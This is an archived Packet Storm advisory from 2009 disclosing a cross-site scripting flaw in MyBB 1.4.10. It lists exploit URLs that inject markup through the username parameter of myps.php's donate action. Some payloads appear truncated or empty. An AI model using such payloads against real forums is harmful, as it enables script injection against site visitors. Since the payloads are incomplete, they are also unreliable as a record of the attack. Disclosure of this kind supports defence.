MyBB 1.4.10 Cross Site Scripting

2009-12-29T00:00:00
ID PACKETSTORM:84279
Type packetstorm
Reporter Steven Abbagnaro
Modified 2009-12-29T00:00:00

Description

                                        
                                            `===============================================  
[+] MyBB v1.4.10 XSS Vulnerability  
  
[+] Author: Steven Abbagnaro  
  
[+] Site: http://ProminentSecurity.com  
  
[+] Contact: Steve@ProminentSecurity.com  
===============================================  
  
[+] Exploit  
  
http://server/myps.php?action=donate&username="/>  
  
http://server/myps.php?action=donate&username=<IMG""">">  
  
http://server/myps.php?action=donate&username=  
  
`